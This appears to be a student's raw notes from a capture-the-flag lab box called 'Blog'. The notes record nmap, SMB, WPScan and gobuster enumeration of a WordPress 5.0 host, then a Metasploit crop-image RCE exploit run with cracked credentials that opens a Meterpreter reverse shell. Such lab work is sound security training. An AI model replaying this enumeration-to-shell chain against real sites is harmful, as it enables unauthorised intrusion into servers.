IP - 
10.10.18.219

3rd hour IP - 
10.10.238.166


My IP - 10.8.60.156


exploit- https://www.exploit-db.com/exploits/46662 
used wordlists – rockyou.txt






















PORT SCAN :- nmap -A 10.10.18.219
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-28 19:44 +0530
Nmap scan report for 10.10.18.219
Host is up (0.21s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 578ada90baed3a470c05a3f7a80a8d78 (RSA)
| 256 c264efabb19a1c87587c4bd50f204626 (ECDSA)
|_ 256 5af26292118ead8a9b23822dad53bc16 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Billy Joel&#039;s IT Blog &#8211; The IT blog
|_http-generator: WordPress 5.0
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: blog
| NetBIOS computer name: BLOG\x00
| Domain name: \x00
| FQDN: blog
|_ System time: 2023-01-28T14:15:22+00:00
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time: 
| date: 2023-01-28T14:15:22
|_ start_date: N/A
| smb2-security-mode: 
| 311: 
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.69 seconds

Enum4linux- enum4linux -a blog.thm
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Jan 28 19:51:24 2023

=========================================( Target Information )=========================================

Target ........... blog.thm
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


==============================( Enumerating Workgroup/Domain on blog.thm )==============================


[+] Got domain/workgroup name: WORKGROUP


==================================( Nbtstat Information for blog.thm )==================================

Looking up status of 10.10.18.219
BLOG <00> - B <ACTIVE> Workstation Service
BLOG <03> - B <ACTIVE> Messenger Service
BLOG <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections

MAC Address = 00-00-00-00-00-00

=====================================( Session Check on blog.thm )=====================================


[+] Server blog.thm allows sessions using username '', password ''


==================================( Getting domain SID for blog.thm )==================================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


=====================================( OS information on blog.thm )=====================================


[E] Can't get OS info with smbclient


[+] Got OS info for blog.thm from srvinfo: 
BLOG Wk Sv PrQ Unx NT SNT blog server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03


=========================================( Users on blog.thm )=========================================


[E] No response using rpcclient querydispinfo



[E] No response using rpcclient enumdomusers


===================================( Share Enumeration on blog.thm )===================================


Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
BillySMB Disk Billy's local SMB Share
IPC$ IPC IPC Service (blog server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP BLOG

[+] Attempting to map shares on blog.thm

//blog.thm/print$ Mapping: DENIED Listing: N/A Writing: N/A
//blog.thm/BillySMB Mapping: OK Listing: OK Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//blog.thm/IPC$ Mapping: N/A Listing: N/A Writing: N/A

==============================( Password Policy Information for blog.thm )==============================



[+] Attaching to blog.thm using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

[+] BLOG
[+] Builtin

[+] Password Info for Domain: BLOG

[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes 
[+] Password Complexity Flags: 000000

[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0

[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes 
[+] Locked Account Duration: 30 minutes 
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes 



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 5


=========================================( Groups on blog.thm )=========================================


[+] Getting builtin groups:


[+] Getting builtin group memberships:


[+] Getting local groups:


[+] Getting local group memberships:


[+] Getting domain groups:


[+] Getting domain group memberships:


====================( Users on blog.thm via RID cycling (RIDS: 500-550,1000-1050) )====================


[I] Found new SID: 
S-1-22-1

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\bjoel (Local User)
S-1-22-1-1001 Unix User\smb (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-3132497411-2525593288-1635041108 and logon username '', password ''

S-1-5-21-3132497411-2525593288-1635041108-501 BLOG\nobody (Local User)
S-1-5-21-3132497411-2525593288-1635041108-513 BLOG\None (Domain Group)

=================================( Getting printer info for blog.thm )=================================

No printers returned.


enum4linux complete on Sat Jan 28 20:06:01 2023










Wpscan:- wpscan --url http://blog.thm -e vp,vt,u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://blog.thm/ [10.10.18.219]
[+] Started: Sat Jan 28 20:01:06 2023

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] robots.txt found: http://blog.thm/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://blog.thm/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://blog.thm/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] Upload directory has listing enabled: http://blog.thm/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blog.thm/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
| Found By: Rss Generator (Passive Detection)
| - http://blog.thm/feed/, <generator>https://wordpress.org/?v=5.0</generator>
| - http://blog.thm/comments/feed/, <generator>https://wordpress.org/?v=5.0</generator>

[+] WordPress theme in use: twentytwenty
| Location: http://blog.thm/wp-content/themes/twentytwenty/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://blog.thm/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 2.1
| Style URL: http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Vulnerable Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:22 <===> (492 / 492) 100.00% Time: 00:00:22
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <=====> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] kwheel
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] bjoel
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] Karen Wheeler
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Rss Generator (Aggressive Detection)

[+] Billy Joel
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Rss Generator (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jan 28 20:01:45 2023
[+] Requests Done: 547
[+] Cached Requests: 10
[+] Data Sent: 137.389 KB
[+] Data Received: 669.181 KB
[+] Memory used: 263.309 MB
[+] Elapsed time: 00:00:39


////////////////////////////////////////////////////////////////////////////
Vulnside
[+] WordPress theme in use: twentytwenty
| Location: http://blog.thm/wp-content/themes/twentytwenty/
| Last Updated: 2022-11-02T00:00:00.000Z
| Readme: http://blog.thm/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 2.1
| Style URL: http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3, Match: 'Version: 1.3'





















smbclient:- smbclient //blog.thm/BillySMB
Password for [WORKGROUP\suraj]:
Try "help" to get a list of possible commands.
smb: \> mget * Alice-White-Rabbit.jpg
Get file Alice-White-Rabbit.jpg? Y
getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (24.9 KiloBytes/sec) (average 24.9 KiloBytes/sec)
Get file tswift.mp4? Y
getting file \tswift.mp4 of size 1236733 as tswift.mp4 (170.2 KiloBytes/sec) (average 147.5 KiloBytes/sec)
Get file check-this.png? Y
getting file \check-this.png of size 3082 as check-this.png (3.5 KiloBytes/sec) (average 134.0 KiloBytes/sec)
Get file Alice-White-Rabbit.jpg? Y
getting file \Alice-White-Rabbit.jpg of size 33378 as Alice-White-Rabbit.jpg (31.0 KiloBytes/sec) (average 123.5 KiloBytes/sec)
smb: \> exit




















Gobuster:- gobuster dir -u http://blog.thm/ -w directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://blog.thm/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/28 20:30:45 Starting gobuster in directory enumeration mode
===============================================================
/rss (Status: 301) [Size: 0] [--> http://blog.thm/feed/]
/login (Status: 302) [Size: 0] [--> http://blog.thm/wp-login.php]
/feed (Status: 301) [Size: 0] [--> http://blog.thm/feed/]
/0 (Status: 301) [Size: 0] [--> http://blog.thm/0/]
/atom (Status: 301) [Size: 0] [--> http://blog.thm/feed/atom/]
/wp-content (Status: 301) [Size: 309] [--> http://blog.thm/wp-content/]
/admin (Status: 302) [Size: 0] [--> http://blog.thm/wp-admin/]
/welcome (Status: 301) [Size: 0] [--> http://blog.thm/2020/05/26/welcome/]
/w (Status: 301) [Size: 0] [--> http://blog.thm/2020/05/26/welcome/]
/n (Status: 301) [Size: 0] [--> http://blog.thm/2020/05/26/note-from-mom/]
/rss2 (Status: 301) [Size: 0] [--> http://blog.thm/feed/]
/wp-includes (Status: 301) [Size: 310] [--> http://blog.thm/wp-includes/]
/no (Status: 301) [Size: 0] [--> http://blog.thm/2020/05/26/note-from-mom/]
/N (Status: 301) [Size: 0] [--> http://blog.thm/2020/05/26/note-from-mom/]
/W (Status: 301) [Size: 0] [--> http://blog.thm/2020/05/26/welcome/]
/rdf (Status: 301) [Size: 0] [--> http://blog.thm/feed/rdf/]
/page1 (Status: 301) [Size: 0] [--> http://blog.thm/]
/Welcome (Status: 301) [Size: 0] [--> http://blog.thm/2020/05/26/welcome/]
/' (Status: 301) [Size: 0] [--> http://blog.thm/]
/dashboard (Status: 302) [Size: 0] [--> http://blog.thm/wp-admin/]
/note (Status: 301) [Size: 0] [--> http://blog.thm/2020/05/26/note-from-mom/]
/%20 (Status: 301) [Size: 0] [--> http://blog.thm/]
/we (Status: 301) [Size: 0] [--> http://blog.thm/2020/05/26/welcome/]
/2020 (Status: 301) [Size: 0] [--> http://blog.thm/2020/]
Progress: 7100 / 220561 (3.22%)^C
[!] Keyboard interrupt detected, terminating.
[ERROR] 2023/01/28 20:35:12 [!] context canceled
===============================================================
2023/01/28 20:35:12 Finished
===============================================================

usernames:-
cat usernames.txt
kwheel
bjoel
Karen Wheeler 
Billy Joel

Run searchsploit 
suraj@15s-fq5:~$ searchsploit wordpress 5.0.0
------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------- ---------------------------------
WordPress 5.0.0 - Image Remote Code Execution | php/webapps/49512.py
WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit) | php/remote/46662.rb
WordPress Core < 5.2.3 - Viewing Unauthenticated/Password/Private Posts | multiple/webapps/47690.md
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service | php/dos/47800.py
WordPress Plugin Database Backup < 5.2 - Remote Code Execution (Metasploit) | php/remote/47187.rb
WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities | php/webapps/39553.txt
WordPress Plugin iThemes Security < 7.0.3 - SQL Injection | php/webapps/44943.txt
WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection | php/webapps/48918.sh
------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results













metasploit has exploit:)
msfconsole 

______________________________________
/ it looks like you're trying to run a \
\ module /
--------------------------------------
\
\
__
/ \
| |
@ @
| |
|| |/
|| ||
|\_/|
\___/


=[ metasploit v6.2.29-dev ]
+ -- --=[ 2271 exploits - 1189 auxiliary - 404 post ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops ]
+ -- --=[ 9 evasion ]

Metasploit tip: View all productivity tips with the 
tips command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/http/wp_crop_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_crop_rce) > show info

Name: WordPress Crop-image Shell Upload
Module: exploit/multi/http/wp_crop_rce
Platform: PHP
Arch: php
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2019-02-19

Provided by:
RIPSTECH Technology
Wilfried Becard <wilfried.becard@synacktiv.com>

Module side effects:
artifacts-on-disk
ioc-in-logs

Module stability:
crash-safe

Module reliability:
repeatable-session

Available targets:
Id Name
-- ----
0 WordPress

Check supported:
Yes

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/
wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
THEME_DIR no The WordPress theme dir name (disable theme auto-detection if provided)
USERNAME yes The WordPress username to authenticate with
VHOST no HTTP server virtual host

Payload information:

Description:
This module exploits a path traversal and a local file inclusion 
vulnerability on WordPress versions 5.0.0 and <= 4.9.8. The 
crop-image function allows a user, with at least author privileges, 
to resize an image and perform a path traversal by changing the 
_wp_attached_file reference during the upload. The second part of 
the exploit will include this image in the current theme by changing 
the _wp_page_template attribute when creating a post. This exploit 
module only works for Unix-based systems currently.

References:
https://nvd.nist.gov/vuln/detail/CVE-2019-8942
https://nvd.nist.gov/vuln/detail/CVE-2019-8943
https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/


View the full module info with the info -d command.

msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS blog.thm
RHOSTS => blog.thm
msf6 exploit(multi/http/wp_crop_rce) > set USERNAME kwheel
USERNAME => kwheel
msf6 exploit(multi/http/wp_crop_rce) > set PASSWORD cutiepie1
PASSWORD => cutiepie1
msf6 exploit(multi/http/wp_crop_rce) > show options

Module options (exploit/multi/http/wp_crop_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD cutiepie1 yes The WordPress password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS blog.thm yes The target host(s), see https://github.com/rapid7/metasploit-framework
/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
THEME_DIR no The WordPress theme dir name (disable theme auto-detection if provided
)
USERNAME kwheel yes The WordPress username to authenticate with
VHOST no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 WordPress



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_crop_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Authenticating with WordPress using kwheel:cutiepie1...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf6 exploit(multi/http/wp_crop_rce) > set LHOST 10.8.60.156
LHOST => 10.8.60.156
msf6 exploit(multi/http/wp_crop_rce) > run
[*] Started reverse TCP handler on 10.8.60.156:4444 
[*] Authenticating with WordPress using kwheel:cutiepie1...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (39927 bytes) to 10.10.7.144
[*] Meterpreter session 1 opened (10.8.60.156:4444 -> 10.10.7.144:55100) at 2023-01-28 21:28:14 +0530
[*] Attempting to clean up files...

meterpreter > shell
Process 1587 created.
Channel 1 created.
SHELL=/bin/bash script -q /dev/null
www-data@blog:/var/www/wordpress$ ls
ls
XtawGZELgF.php wp-blog-header.php wp-includes wp-signup.php
index.php wp-comments-post.php wp-links-opml.php wp-trackback.php
license.txt wp-config-sample.php wp-load.php xmlrpc.php
readme.html wp-config.php wp-login.php
wp-activate.php wp-content wp-mail.php
wp-admin wp-cron.php wp-settings.php
www-data@blog:/var/www/wordpress$ ^C
Terminate channel 1? [y/N] y
meterpreter > 
[*] 10.10.7.144 - Meterpreter session 1 closed. Reason: Died
Interrupt: use the 'exit' command to quit
meterpreter > exit
[*] Shutting down Meterpreter...

